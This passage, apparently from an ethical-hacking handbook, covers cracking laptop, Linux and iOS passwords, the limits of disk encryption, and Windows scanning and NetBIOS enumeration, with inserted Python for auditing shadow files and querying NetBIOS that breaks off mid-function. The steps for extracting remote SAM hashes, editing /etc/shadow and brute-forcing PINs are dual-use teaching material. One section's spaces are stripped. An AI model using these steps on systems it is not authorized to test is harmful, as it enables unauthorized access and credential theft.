My favorite tool to demonstrate the risks associated with unencrypted laptops running Windows is ElcomSoft System Recovery (www.elcomsoft.com/esr.html). You simply burn this tool to a CD and use it to boot the system you want to recover (or reset) the password from, as shown in Figure 11-1.

Figure 11-1: ElcomSoft System Recovery is great for cracking and resetting Windows passwords on unprotected laptops.

You have the option to reset the local administrator (or other) password or have it crack all passwords. It's really that simple, and it's highly successful, even on the latest operating systems, such as Windows 8.1 or Windows 10. The most difficult and time-consuming thing about ElcomSoft System Recovery is downloading and burning it to CD.

You can also use an older tool for Windows called NTAccess (www.mirider.com/ntaccess.html) for resetting local Windows accounts. This program isn't pretty or fancy, but it does the job. There are others available as well. As with ophcrack (discussed a little later in this section), ElcomSoft and NTAccess provide an excellent way to demonstrate that you need to encrypt your laptop hard drives.

People will tell you they don't have anything important or sensitive on their laptops. They do. Even seemingly benign laptops used for training or sales can have tons of sensitive information that can be used against your business. This includes spreadsheets that users have copied from the network to work on locally, VPN connections with stored login credentials, web browsers that have cached browsing history, and even worse, website passwords that users have chosen to save.

After you reset or crack the local administrator (or other) account, you can log in to Windows and have full access to the system. By simply poking around using WinHex (www.winhex.com/winhex) or similar or AccessEnum (https://technet.microsoft.com/en-us/library/bb897332.aspx), you can find sensitive information, remote network connections, and cached web connections to demonstrate the business risk. If you want to dig even deeper, you can use additional tools from ElcomSoft (www.elcomsoft.com/products.html), such as ElcomSoft Internet Password Breaker, Proactive System Password Recovery, and Advanced EFS Data Recovery for uncovering additional information from Windows systems. Passware (www.lostpassword.com) offers many similar commercial tools as well.

If you want to perform similar checks on a Linux-based laptop, you should be able to boot from a Knoppix (www.knoppix.net) or similar "live" Linux distribution and edit the local password file (on most systems /etc/shadow, which holds the password hashes) to reset or change it. Remove the encrypted code between the first and second colons for the "root" (or whatever user) entry or copy the password from the entry of another user and paste it into that area. Passware Kit Forensic can be used to decrypt Mac OS X systems encrypted with FileVault 2.
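A defender-side check that follows from the edit just described: when a laptop has been out of your hands, audit its /etc/shadow for an emptied password field or a hash copied from another account, the two changes the text walks through. This is an added example, not the book's; the shadow-format sample is constructed, and the set of hash algorithms it treats as legacy is an assumption of the example.

```python
from typing import List, Tuple

# Constructed sample in /etc/shadow format (not from a real system). Fields are
# colon-separated; the second field is the password hash. An empty second field
# means "no password", '!' or '*' means the account is locked, and a $id$ prefix
# names the hash algorithm ($1$ = MD5, $5$ = SHA-256, $6$ = SHA-512).
# root has had its hash removed and bob carries alice's hash: the two edits
# the text describes. carol still uses a legacy MD5 hash.
SAMPLE_SHADOW = """\
root::17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
alice:$6$saltsalt$hashofalice:17000:0:99999:7:::
bob:$6$saltsalt$hashofalice:17000:0:99999:7:::
carol:$1$oldsalt$legacymd5hash:17000:0:99999:7:::
dave:!:17000:0:99999:7:::
"""

# Hash identifiers this example treats as legacy (an assumption; extend to taste).
LEGACY_ALGORITHMS = {"1", "des"}   # $1$ = MD5-crypt; "des" = unprefixed DES hash
LOCKED_PREFIXES = ("!", "*")


def hash_algorithm(pw_field: str) -> str:
    """Return the $id$ of a crypt(3) hash, or 'des' for a legacy unprefixed hash."""
    if pw_field.startswith("$"):
        return pw_field.split("$")[1]
    return "des"


def audit_shadow(text: str) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for a shadow-format file.

    empty-password: the account logs in without a password (hash field cleared)
    weak-hash:      the hash uses a legacy algorithm
    shared-hash:    the identical hash string on more than one account, which
                    does not happen by chance with salted hashes
    malformed:      a line without the nine shadow fields
    """
    findings: List[Tuple[str, str]] = []
    hash_owners = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 9:
            findings.append(("malformed", f"line {lineno}"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append(("empty-password", user))
        elif pw.startswith(LOCKED_PREFIXES):
            continue  # locked or system account without a usable password
        else:
            if hash_algorithm(pw) in LEGACY_ALGORITHMS:
                findings.append(("weak-hash", user))
            hash_owners.setdefault(pw, []).append(user)
    for users in hash_owners.values():
        if len(users) > 1:
            findings.append(("shared-hash", ",".join(sorted(users))))
    return findings


if __name__ == "__main__":
    for finding, detail in audit_shadow(SAMPLE_SHADOW):
        print(f"{finding:15} {detail}")
```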

If you're budget-strapped and need a free option for cracking Windows passwords, you can use ophcrack as a standalone program in Windows by following these steps:

1. Download the source file from http://ophcrack.sourceforge.net.

2. Extract and install the program by entering the following command:

ophcrack-vista-livecd-3.6.0.exe (or whatever the current filename is)

3. Load the program by starting the ophcrack icon from your Start menu.

4. Click the Load button and select the type of test you want to run.

In this example, shown in Figure 11-2, I'm connecting to a remote server called server1. This way, ophcrack will authenticate to the remote server using my locally logged-in username and run pwdump code to extract the password hashes from the server's SAM database. You can also load hashes from the local machine or from hashes extracted during a previous pwdump session.

The extracted password hash usernames will look similar to those shown in Figure 11-3.

5. Click the Launch icon to begin the rainbow crack process.

If you see that password hashes are only in the NT Hash column as shown in Figure 11-3, you'll need to make sure you have downloaded the proper hash tables from http://ophcrack.sourceforge.net/tables.php or elsewhere. A good one to start with would be Vista special (8.0GB). In order to load new tables, you click the Tables icon at the top of the ophcrack window as shown in Figure 11-4.

Figure 11-2: Loading password hashes from a remote SAM database in ophcrack.

Figure 11-3: Usernames and hashes extracted via ophcrack.

Figure 11-4: Loading the required hash tables in ophcrack.

If necessary, relaunch the rainbow crack process in Step 5. The process can take just a few seconds to several days (or more) depending on your computer's speed and the complexity of the hashes being cracked.

There's also a bootable Linux-based version of ophcrack (available at http://ophcrack.sourceforge.net/download.php?type=livecd) that allows you to boot a system and start cracking passwords without having to log in or install any software.

I highly recommend you use ophcrack's LiveCD on a sample laptop computer or two to demonstrate just how simple it is to recover passwords and, subsequently, sensitive information from laptops that don't have encrypted hard drives. It's amazingly simple, yet people still refuse to invest money in full disk encryption software. ElcomSoft System Recovery is another great tool for this exercise.

Countermeasures

The best safeguard against a hacker using a password reset program against your systems is to encrypt your hard drives. You can use BitLocker in Windows, WinMagic SecureDoc (www.winmagic.com/products), or other preferred product for the platform your systems are running on.

Power-on passwords set in the BIOS can be helpful as well, but they're often a mere bump in the road. All a criminal has to do is reset the BIOS password or, better yet, simply remove the hard drive from your lost system and access it from another machine. You also need to ensure that people can't gain unauthorized physical access to your computers. When a hacker has physical access and your drives are not encrypted, all bets are off. That said, full disk encryption is not foolproof — see the nearby sidebar, "The fallacy of full disk encryption."

The fallacy of full disk encryption

It seems simple enough to just encrypt your laptop hard drives and be done with laptop security. In a perfect world, that would be the case, but as long as people are involved, I suspect this mobile weakness will continue to exist.

Several problems with disk encryption create a false sense of security:

Password selection: Your disk encryption is only as good as the password (or passphrase) that was used to enable the encryption.

Key management: If your users don't have a way to get into their systems if they forget or lose their passwords, they'll get burned once and do whatever it takes not to encrypt their drives moving forward. Also, certain disk encryption software such as Microsoft's BitLocker may provide the option for (or even require) users to carry around their decryption key on a thumb drive or similar storage device. Imagine losing a laptop with the key to the kingdom stored right inside the laptop bag! It happens.

Screen locking: This third potentially fatal flaw with full disk encryption occurs when users refuse to ensure their screens are locked whenever they step away from their encrypted laptops. All it takes is a few seconds for a criminal to swipe a laptop to gain — and maintain — full access to a laptop that's "fully protected" with full disk encryption.

One final note, and this is important: certain types of full disk encryption can be cracked altogether. For example, the protections offered by BitLocker, FileVault 2 (Mac OS X), and TrueCrypt can be fully negated by a program from Passware called Passware Kit Forensic (www.lostpassword.com/kit-forensic.htm). I cover this flaw and other enterprise security concerns involving BitLocker in my whitepapers available at www.principlelogic.com/bitlocker.html. Furthermore, you shouldn't be using TrueCrypt given that its original developers went dark and flaws exist that can allow for full system compromise. Another option for cracking encrypted disks is ElcomSoft Forensic Disk Decryptor (www.elcomsoft.com/efdd.html). Even with these vulnerabilities, full disk encryption can still protect your systems from the less technically-inclined passers-by who might end up in possession of one of your lost or stolen systems.

Cracking Phones and Tablets

I don't envy IT administrators and information security managers for many reasons but especially when it comes to the bring your own device (BYOD) movement taking place in business today. With BYOD, you have to trust that your users are making good decisions about security, and you have to figure out how to manage each and every device, platform, and app. This management task is arguably the greatest challenge IT professionals have faced to this point. Further complicating matters, you have criminal hackers, thieves, and other hooligans doing their best to exploit the complexity of it all, and it's creating some serious business risks. The reality is that very few businesses — and individuals — have their phones and tablets properly secured.

Plenty of vendors claim that their mobile device management (MDM) solutions are the answer to phone and tablet woes. They're right … to an extent. MDM controls that separate personal information from business information and ensure the proper security controls are enabled at all times can help you make a big leap toward locking down the mobile enterprise.

One of the greatest things you can do to protect phones and tablets from unauthorized use is to implement this nifty security control that dates back to the beginning of computers: passwords. Yep, your phone and tablet users should employ good old-fashioned passwords (technically passphrases) that are easy to remember yet hard to guess. Passwords are one of the best controls you can have. Yet there are plenty of mobile devices with no passwords or passwords that are easily cracked.

Starting with iOS 9, devices come with a 6-character passcode default. Android Lollipop originally defaulted to encrypting the entire device although that was reversed after complaints of performance degradation.

In the following section, I demonstrate accessing mobile devices by using a commercial forensics tool. Keep in mind that such tools are typically restricted to law enforcement personnel and security professionals, but they could certainly end up in the hands of the bad guys. Using such tools for your own information security testing can be a great way to demonstrate the business risk and make the case for better mobile controls.

Mobile apps can introduce a slew of security vulnerabilities into your environment, especially certain apps available for Android via Google Play that aren't properly vetted. In recent source code analysis using Checkmarx's CxSuite (see Chapter 15), I've found these apps to have the same flaws as traditional software, such as SQL injection, hard-coded encryption keys, and buffer overflows that can put sensitive information at risk. The threat of malware is there as well. Mobile apps are yet another reason to get your mobile environment under control using, at a minimum, a proven MDM system such as MaaS360 (www.maas360.com) or AirWatch (www.air-watch.com).

Cracking iOS passwords

I'd venture to guess that many phone and tablet passwords (really, they're just 4-digit PINs, or passcodes) can be guessed outright. A mobile device gets lost or stolen and all the person recovering it has to do is try some basic number combinations such as 1234, 1212, or 0000. Soon, voilà! — the system is unlocked.

Many phones and tablets running iOS and Android are configured to wipe the device if the incorrect password is entered X number of times (often 10 failed attempts). A reasonable security control indeed. But what else can be done? Some commercial tools can be used to crack simple passwords/PINs and recover information from lost or stolen devices or devices undergoing a forensics investigation.

ElcomSoft's iOS Forensic Toolkit (http://ios.elcomsoft.com) provides a means for demonstrating just how easily passwords/PINs on iOS-based phones and tablets can be cracked up through iOS version 7. Here's how:

1. Plug your iPhone/iPod/iPad into your test computer and place it into Device Firmware Upgrade (DFU) mode.

To enter DFU mode, simply power the device off, hold down the Home button (bottom center) and sleep button (often the upper right corner) at the same time for 10 seconds, and continue holding down the Home button for another 10 seconds. The mobile device screen goes blank.

2. Load the iOS Forensic Toolkit by inserting your USB license dongle into your test computer and running Toolkit.cmd.

You see the screen shown in Figure 11-5.

3. Load the iOS Forensic Toolkit Ramdisk onto the mobile device by selecting option 2 LOAD RAMDISK.

Loading the RAMDISK code allows your test computer to communicate with the mobile device and run the tools needed for cracking the password (among other things).

4. Select the iOS device that's connected, as shown in Figure 11-6.

I selected option 14 because I have an iPhone 4 with GSM.

You now see the toolkit connect to the device and confirm a successful load, as shown in Figure 11-7. You should see the ElcomSoft logo in the middle of your mobile device's screen as well.

5. To crack the device's password/PIN, simply select option 6 GET PASSCODE on the main menu.

iOS Forensic Toolkit will prompt you to save the passcode to a file. You can press Enter to accept the default of passcode.txt. The cracking process will commence and, with any luck, the passcode will be found and displayed as shown in Figure 11-8.

So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is not much better. User beware!

You can also use iOS Forensic Toolkit to copy files and even crack the keychains to uncover the password that protects the device's backups in iTunes (option 5 GET KEYS).

Using ElcomSoft's iOS Forensic Toolkit to crack iOS versions 8 and up won't be quite as fruitful for now as Apple has finally started to really lock down the operating system. Apple iOS is still not without its flaws. As recently as iOS 9, there was an exploit that allowed attackers to bypass the login screen altogether.

If anything, you need to be thinking about how your business information, which is most certainly present on phones and tablets, is going to be handled in the event one of your employee's devices is seized by law enforcement personnel. Sure, they'll follow their chain-of-custody procedures, but overall, they'll have very little incentive to ensure the information stays protected in the long term.

Figure 11-5: iOS Forensic Toolkit's main page.

Figure 11-6: Select the appropriate iOS device from the list.

Figure 11-7: iOS Forensic Toolkit Ramdisk loading successfully.

Figure 11-8: Cracking a 4-digit PIN on an iPhone.

Be careful with how you sync your mobile devices and, especially, where the file backups are stored. They may be off in the wild blue yonder (the cloud), which means you have no real way to gauge how secure the personal and business information truly is. On the other hand, when synched files and backups are stored without a password, with a weak password, or on an unencrypted laptop, everything is still at risk given the tools available to crack the encryption used to protect this information. For instance, ElcomSoft's Phone Breaker (www.elcomsoft.com/eppb.html) can be used to unlock backups from BlackBerry and Apple devices as well as recover online backups made to iCloud and Windows Live!.

Oxygen Forensic Suite (www.oxygen-forensic.com) is an alternative commercial tool that can be used for cracking iOS-based passwords as well as additional recovery functionality for Android-based systems. Figure 11-9 shows the Oxygen Forensic Suite interface and types of information that can be extracted from an Android-based device. The Oxygen Forensic Suite Extractor tool can connect and extract this information relatively quickly — something that can, of course, be used against your organization when mobile devices are lost or stolen.

Figure 11-9: Oxygen Forensic Suite.

Oxygen Forensic Suite is also great for performing security assessments of mobile apps, which I cover in Chapter 15.

Countermeasures against password cracking

The most realistic way to prevent such password cracking is to require — and continually enforce — strong passwords such as multi-digit PINs consisting of 5 or more numbers or, better yet, complex passphrases that are very easy to remember yet practically impossible to crack such as Progressive_r0ck_rules!. MDM controls can help you enforce such a policy. You'll likely get pushback from employees and management, but it's the only sure bet to help prevent this attack. I cover getting buy-in for your security initiatives in Chapter 20. Good luck!

Hacking the Internet of Things

No chapter on mobile devices would be complete without some coverage of the Internet of Things (IoT). Computer systems that fall into this "IoT" include everything from home alarm systems to manufacturing equipment to coffee pots and pretty much anything in between. Even automobiles can now be hacked as you've likely heard about in the highly publicized hack against a Jeep Cherokee in 2015.

Cisco Systems has estimated that the IoT will grow to 50 billion devices by 2020! Perhaps this is why all IPv4 addresses are now gone. I'm not sure that that's a good thing for most people, but it certainly sounds like job security for those of us working in this industry. If you're going to lock down IoT systems, you must first understand how they're vulnerable. Given that IoT systems are not unlike other network systems (i.e., they have an IP address and/or a web interface), you'll be able to use standard vulnerability scanners to uncover flaws. Additional security checks you should run on IoT systems include:

What information is stored on the system (i.e., sensitive customer information, intellectual property, or biodata from devices such as Fitbits and Apple Watches)? If systems are lost or stolen, is that going to create business risks?

How is information communicated to and from each system? Is it encrypted?

Are passwords required? What are the default password complexity standards? Can they be changed? Does intruder lockout exist to help prevent password cracking?

What patches are missing that facilitate security exploits? Are software updates even available?

How do the systems stand up under vulnerability scans and, even more so, simulated denial of service attacks?

What additional security policies need to be put in place to address IoT systems?

Just like any other system in your network environment, IoT systems, devices, and widgets (or whatever you call them) need to be included in the scope of your security testing. If they're not, vulnerabilities could be lurking that, if eventually exploited, can lead to a breach or a potentially even more catastrophic situation.

PartIV

HackingOperatingSystems

Visitwww.dummies.com/extras/hackingformoregreatDummiescontentonline.

Inthispart…Nowthatyou’repastthenetworklevel,it’stimetogetdowntothenitty-gritty—thosefunoperatingsystemsyouuseonadailybasisandhavecometobothlove(andhate).Idefinitelydon’thaveenoughroominthisbooktocovereveryoperatingsystemversionoreveneveryoperatingsystemvulnerability,butIcertainlyhittheimportantparts—especiallytheonesthataren’teasilyfixedwithpatches.

Thispartstartsbylookingatthemostwidelyused(andpickedon)operatingsystem—MicrosoftWindows.FromWindowsXP(yep,it’sstilloutthere!)toWindows10andServer2016,Ishowyousomeofthebestwaystoattacktheseoperatingsystemsandsecurethemfromthebadguys.ThispartthenlooksatLinuxanditslesspublicized(yetstillmajor)securityflaws.ManyofthehacksandcountermeasuresIcovercanapplytomanyotherflavorsofUNIXand,yes,evenMacOSXaswell.

Chapter12

WindowsInThisChapter

PortscanningWindowssystems

GleaningWindowsinformationwithoutloggingin

CatchingtheWindowssecurityflawsyoudon’twanttooverlook

ExploitingWindowsvulnerabilities

MinimizingWindowssecurityrisks

MicrosoftWindows(withsuchversionsasWindows7;WindowsServer2012;Windows8.1;andthenewestflavor,Windows10)isthemostwidelyusedoperatingsystem(OS)intheworld.It’salsothemostwidelyabused.IsthisbecauseMicrosoftdoesn’tcareasmuchaboutsecurityasotherOSvendors?Theshortansweris“no.”Sure,numeroussecurityflawswereoverlooked—especiallyintheWindowsNTdays—butMicrosoftproductsaresopervasivethroughouttoday’snetworksthatMicrosoftistheeasiestvendortopickon;therefore,Microsoftproductsoftenendupinthebadguys’crosshairs.Theonepositiveaboutcriminalhackersisthatthey’redrivingtherequirementforbettersecurity!

Manyofthesecurityflawsintheheadlinesaren’tnew.They’revariantsofvulnerabilitiesthathavebeenaroundforalongtime.You’veheardthesaying,“Themorethingschange,themoretheystaythesame.”Thatapplieshere,too.MostWindowsattacksarepreventableifthepatchesareproperlyapplied.Thus,poorsecuritymanagementisoftentherealreasonWindowsattacksaresuccessful,yetMicrosofttakestheblameandmustcarrytheburden.

InadditiontothepasswordattacksIcoverinChapter8,manyotherattacksarepossibleagainstaWindows-basedsystem.TonsofinformationcanbeextractedfromWindowsbysimplyconnectingtothesystemacrossanetworkandusingtoolstoextracttheinformation.Manyofthesetestsdon’tevenrequireyoutobeauthenticatedtotheremotesystem.AllsomeonewithmaliciousintentneedstofindonyournetworkisavulnerableWindowscomputerwithadefaultconfigurationthat’snotprotectedbysuchmeasuresasapersonalfirewallandthelatestsecuritypatches.

Whenyoustartpokingaroundonyournetwork,youmightbesurprisedathowmanyofyourWindows-basedcomputershavesecurityvulnerabilities.Furthermore,you’llbeevenmoresurprisedatjusthoweasyitistoexploitvulnerabilitiestogaincompleteremotecontrolofWindowsbyusingatoolsuchasMetasploit.AfteryouconnecttoaWindowssystemandhaveavalidusernameandpassword(byknowingitorderivingitbyusingthepassword-crackingtechniquesdiscussedinChapter8orothertechniquesoutlinedinthischapter),youcandigdeeperandexploitotheraspectsofWindows.

Thischaptershowsyouhowtotestforsomeofthelow-hangingfruitinWindows(the

flawsthatgetpeopleintotroublethemost)andoutlinescountermeasurestomakesureyourWindowssystemsaresecure.

IntroducingWindowsVulnerabilitiesGivenWindows’easeofuse,itsenterprise-readyActiveDirectoryservice,andthefeature-rich.NETdevelopmentplatform,mostorganizationsusetheMicrosoftplatformformuchoftheirnetworkingandcomputingneeds.Manybusinesses—especiallythesmall-tomedium-sizedones—dependsolelyontheWindowsOSfornetworkusage.Manylargeorganizationsruncriticalservers,suchaswebserversanddatabaseservers,ontheWindowsplatformaswell.Ifsecurityvulnerabilitiesaren’taddressedandmanagedproperly,theycanbringanetworkoranentireorganization(largeorsmall)toitsknees.

When Windows and other Microsoft software are attacked, especially by a widespread Internet-based worm or virus, hundreds of thousands of organizations and millions of computers are affected. Many well-known attacks against Windows can lead to the following problems:

- Leakage of sensitive information, including files containing healthcare information and credit card numbers
- Passwords being cracked and used to carry out other attacks
- Systems taken completely offline by denial of service (DoS) attacks
- Full remote control being obtained
- Entire databases being copied or deleted

When unsecured Windows-based systems are attacked, serious things can happen to a tremendous number of computers around the world.

Choosing Tools

Literally hundreds of Windows hacking and testing tools are available. The key is to find a set of tools that can do what you need and that you're comfortable using.

Many security tools, including some of the tools in this chapter, work with only certain versions of Windows. The most recent version of each tool in this chapter should be compatible with currently supported versions of Windows (Windows 7 and Windows Server 2008 R2 and newer), but your mileage may vary.

I have found that the more security tools and other "power user" applications you install in Windows, especially programs that tie into the network drivers and TCP/IP stack, the more unstable Windows becomes. I'm talking about slow performance, general instability issues, and even the occasional blue screen of death. Unfortunately, often the only fix is to reinstall Windows and all your applications. After years of rebuilding my testing systems every few months, I finally wised up and bought a copy of VMware Workstation and a dedicated computer that I can junk up with testing tools without worrying about it affecting my ability to get my other work done. (Ah, the memories of those DOS and Windows 3.x days when things were much simpler!)

Free Microsoft tools

You can use the following free Microsoft tools to test your systems for various weaknesses:

- Built-in Windows programs for NetBIOS and TCP/UDP service enumeration, such as these three:
  - nbtstat for gathering NetBIOS name table information
  - netstat for displaying open ports on the local Windows system
  - net for running various network-based commands, including viewing shares on remote Windows systems and adding user accounts after you gain a remote command prompt via Metasploit
- Microsoft Baseline Security Analyzer (MBSA) (https://technet.microsoft.com/en-us/security/cc184924.aspx) to test for missing patches and basic Windows security settings
- Sysinternals (http://technet.microsoft.com/en-us/sysinternals/default.aspx) to poke, prod, and monitor Windows services, processes, and resources both locally and over the network

All-in-one assessment tools

All-in-one tools perform a wide variety of security tests, including the following:

- Port scanning
- OS fingerprinting
- Basic password cracking
- Detailed vulnerability mappings of the various security weaknesses that the tools find on your Windows systems

I typically use these tools in my work with very good results:

- GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)
- Nexpose (www.rapid7.com/products/nexpose)

Task-specific tools

The following tools perform more specific tasks for uncovering Windows-related security flaws. These tools provide detailed insight into your Windows systems and provide information that you might not otherwise get from all-in-one assessment tools:

- Metasploit (www.metasploit.com) for exploiting vulnerabilities that such tools as Nexpose and Qualys discover to obtain remote command prompts, add users, set up remote backdoors, and much more
- NetScanTools Pro (www.netscantools.com) for port scanning, ping sweeps, and share enumeration
- SoftPerfect Network Security Scanner (www.softperfect.com/products/networkscanner) for port scanning and share enumeration
- TCPView (http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx) to view TCP and UDP session information
- Winfo (www.ntsecurity.nu/toolbox/winfo) for null session enumeration to gather such configuration information as security policies, local user accounts, and shares

Keep in mind that disabling the Windows Firewall (or other third-party firewall that's running on your test system) can help speed things up. Ditto for anti-virus software; just be careful. If possible, run your security tests using a dedicated system or virtual machine, because doing so minimizes any impact your test results may have on the other work you do on your computer.

Gathering Information About Your Windows Vulnerabilities

When you assess Windows vulnerabilities, start by scanning your computers to see what the bad guys can see.

The exploits in this chapter were run against Windows from inside a firewall, on the internal network. Unless I point out otherwise, all the tests in this chapter can be run against all versions of the Windows OS. The attacks in this chapter are significant enough to warrant testing for, regardless of your current setup. Your results will vary from mine depending on the specific version of Windows, patch levels, and other system hardening you've done.

System scanning

A few straightforward processes can identify weaknesses in Windows systems.

Testing

Start gathering information about your Windows systems by running an initial port scan:

1. Run basic scans to find which ports are open on each Windows system.

Scan for TCP and UDP ports with a port scanning tool, such as NetScanTools Pro. The NetScanTools Pro results shown in Figure 12-1 reveal several potentially vulnerable ports open on a Windows 7 system, including those for DNS (UDP port 53); the ever-popular, and easily hacked, NetBIOS session service (TCP port 139); and the SQL Server Browser service (UDP port 1434).

2. Perform OS enumeration (such as scanning for shares and specific OS versions) by using an all-in-one assessment tool, such as LanGuard.

Figure 12-2 shows a LanGuard scan that reveals the server version, vulnerabilities, open ports, and more.

As you can see, GFI ranks AutoRun being enabled and source-routed packets being accepted from arbitrary hosts as "High" security vulnerabilities. I discuss the subject of vulnerability prioritization in Chapter 17.

If you need to quickly identify the specific version of Windows that's running, you can use Nmap (http://nmap.org/download.html) with the -O option (nmap -O ip_address), as shown in Figure 12-3.

Other OS fingerprinting tools are available, but I've found Nmap to be one of the most accurate.

3. Determine potential security vulnerabilities.

This is subjective and might vary from system to system, but what you want to look for are interesting services and applications; then proceed from there.

Figure 12-1: Port scanning a Windows 7 system with NetScanTools Pro.

Figure 12-2: Gathering port and vulnerability details from a Windows-based web server with LanGuard.

Figure 12-3: Using Nmap to determine the Windows version.

Countermeasures against system scanning

You can prevent an external attacker or malicious internal user from gathering certain information about your Windows systems by implementing the proper security settings on your network and on the Windows hosts. You have the following options:

- Use a network firewall or web application firewall (WAF) for systems running Internet Information Services (IIS).
- Use the Windows Firewall or other personal firewall software on each system. You want to block the Windows networking ports for RPC (TCP port 135) and NetBIOS/SMB (ports 137 through 139 and 445).
- Disable unnecessary services so that they don't appear when a connection is made.

NetBIOS

You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN.

These Windows NetBIOS ports can be compromised if they aren't properly secured:

- UDP ports for name resolution and network browsing:
  - Port 137 (NetBIOS name service; WINS is Microsoft's NetBIOS name server and uses this port)
  - Port 138 (NetBIOS datagram service)
- TCP ports for Server Message Block (SMB):
  - Port 139 (NetBIOS session service, which carries SMB, also known as CIFS, over NetBIOS)
  - Port 445 (SMB directly over TCP/IP, without NetBIOS)

Hacks

The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS.

Unauthenticated enumeration

When you're performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems two ways:

- Using all-in-one scanners, such as LanGuard or Nexpose
- Using the nbtstat program that's built into Windows (nbtstat stands for NetBIOS over TCP/IP Statistics)

Figure 12-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.

Figure 12-4: Using nbtstat to gather information on a Windows 7 system.

nbtstat shows the remote computer's NetBIOS name table, which you gather by using the nbtstat -A command followed by the target's address (nbtstat -A ip_address). This displays the following information:

- Computer name
- Domain name
- Computer's MAC address

An advanced program such as Nexpose isn't necessary to gather this basic information from a Windows system. However, the graphical interface offered by commercial software such as this presents its findings in a prettier fashion and is often much easier to use. Additionally, you have the benefit of gathering the information you need with one tool.
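To show what nbtstat -A actually does on the wire, here is an added Python example (not code from the book or from any of the tools it mentions) that builds the NetBIOS node status request defined in RFC 1002, parses the node status response into the name table, and pulls out the computer name, workgroup or domain, and MAC address that nbtstat reports. The response it parses offline is constructed, not a capture: the host name THINKPAD, the workgroup WORKGROUP, and the MAC address are made up. query_host sends a real query to UDP port 137 and should only be pointed at systems you're authorized to test.

```python
import socket
import struct

# RFC 1002 constants: NBSTAT question type, IN class, and the two NAME_FLAGS bits we use
NBT_PORT = 137
NBSTAT = 0x0021
CLASS_IN = 0x0001
FLAG_GROUP = 0x8000   # G bit: group name (workgroup/domain) rather than a unique name
FLAG_ACTIVE = 0x0400  # ACT bit: name is currently registered on the host

# What the 16th byte (the <xx> suffix nbtstat prints) means, keyed by (suffix, is_group)
SUFFIX_MEANING = {
    (0x00, False): "workstation service (computer name)",
    (0x00, True): "domain/workgroup name",
    (0x1B, False): "domain master browser",
    (0x1C, True): "domain controllers",
    (0x1E, True): "browser service elections",
    (0x20, False): "file server service",
}


def encode_netbios_name(name, suffix=0x00, pad=b" "):
    """First-level encoding (RFC 1001 14.1): pad to 15 bytes, append the suffix byte,
    write each byte as two 'A'+nibble characters; returned as a length-prefixed label."""
    raw = name[:15].ljust(15, pad) + bytes([suffix])
    enc = bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return bytes([len(enc)]) + enc + b"\x00"


def build_node_status_request(txn_id=0x1234):
    """The NODE STATUS REQUEST nbtstat -A sends to UDP/137: a query for the wildcard
    name '*' (NUL-padded, not space-padded) with question type NBSTAT."""
    header = struct.pack(">HHHHHH", txn_id, 0x0000, 1, 0, 0, 0)   # QDCOUNT=1
    return header + encode_netbios_name(b"*", 0x00, pad=b"\x00") + struct.pack(">HH", NBSTAT, CLASS_IN)


def _skip_name(data, off):
    """Advance past a DNS-style name (labels or a 2-byte compression pointer)."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_node_status_response(data):
    """Parse a NODE STATUS RESPONSE into the name table plus the UNIT_ID (MAC address)."""
    txn_id, flags, qdcount, ancount, _, _ = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an NBT-NS response carrying an answer")
    off = 12
    for _ in range(qdcount):                      # some stacks echo the question section
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)                   # answer RR name
    rr_type, rr_class, _ttl, rdlength = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rr_type != NBSTAT or rr_class != CLASS_IN:
        raise ValueError("answer is not an NBSTAT record")
    end, num_names, off = off + rdlength, data[off], off + 1
    names = []
    for _ in range(num_names):                    # 18 bytes each: 15 name + suffix + flags
        nflags = struct.unpack_from(">H", data, off + 16)[0]
        suffix, group = data[off + 15], bool(nflags & FLAG_GROUP)
        names.append({"name": data[off:off + 15].rstrip(b" \x00").decode("ascii", "replace"),
                      "suffix": suffix, "group": group, "active": bool(nflags & FLAG_ACTIVE),
                      "meaning": SUFFIX_MEANING.get((suffix, group), "other")})
        off += 18
    mac = ":".join(f"{b:02X}" for b in data[off:off + 6]) if off + 6 <= end else None
    return {"txn_id": txn_id, "names": names, "mac": mac}


def summarize(table):
    """The three things nbtstat -A is usually run for: computer name, domain/workgroup, MAC."""
    host = next((n["name"] for n in table["names"] if n["suffix"] == 0x00 and not n["group"]), None)
    domain = next((n["name"] for n in table["names"] if n["suffix"] == 0x00 and n["group"]), None)
    return {"computer": host, "domain": domain, "mac": table["mac"]}


def build_sample_response(txn_id=0x1234):
    """Constructed response (not a capture): workstation THINKPAD in workgroup WORKGROUP."""
    entries = [(b"THINKPAD", 0x00, FLAG_ACTIVE), (b"WORKGROUP", 0x00, FLAG_GROUP | FLAG_ACTIVE),
               (b"THINKPAD", 0x20, FLAG_ACTIVE), (b"WORKGROUP", 0x1E, FLAG_GROUP | FLAG_ACTIVE)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes.fromhex("000c29abcdef") + b"\x00" * 40        # made-up UNIT_ID + zeroed stats
    header = struct.pack(">HHHHHH", txn_id, 0x8400, 0, 1, 0, 0)  # response bit set, ANCOUNT=1
    answer = encode_netbios_name(b"*", 0x00, pad=b"\x00") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + answer + rdata


def query_host(ip, timeout=2.0):
    """Live equivalent of nbtstat -A ip_address; only against hosts you are authorized to test."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, NBT_PORT))
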